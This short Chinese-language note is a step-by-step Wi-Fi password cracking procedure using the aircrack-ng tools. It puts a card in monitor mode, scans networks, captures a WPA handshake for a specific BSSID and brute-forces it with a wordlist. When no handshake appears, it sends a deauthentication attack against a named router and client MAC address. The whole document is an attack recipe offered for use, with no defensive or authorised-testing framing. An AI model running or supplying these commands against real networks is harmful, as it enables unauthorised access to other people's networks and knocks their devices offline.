1. wlan0开启monitor mode : airmon-ng start wlan0
2. 查看附近的无线网络 : airodump-ng wlan0mon
3. 抓取无线网络数据包 : airodump-ng -c 6 --bssid F0:B4:29:29:8A:03 -w name wlan0mon (当出现handshake时说明抓包成功)
-c : CH的值 ; --bssid : BSSID的值 ; -w : 存放抓取数据包的文件名
4. 通过密码字典文件暴力破解该无线网络的密码 : aircrack-ng -w /usr/share/wordlists/sqlmap.txt name-01.cap
5. 关闭无线网卡的monitor mode : airmon-ng stop wlan0mon
如果在步骤3,我们一直抓不到握手包 , 可以攻击一下无线路由,
a) 新开一个terminal
b) aireplay-ng -0 1 -a F0:B4:29:29:8A:03 -c 08:ED:B9:89:FB:B1 wlan0mon
-0 : 采用deauth攻击模式,后面加攻击次数,1-10 即可
-a : 路由器的mac地址
-c : 客户端的mac地址 (我们在步骤2看到的STATION下面的值就是某一个路由对应的客户端)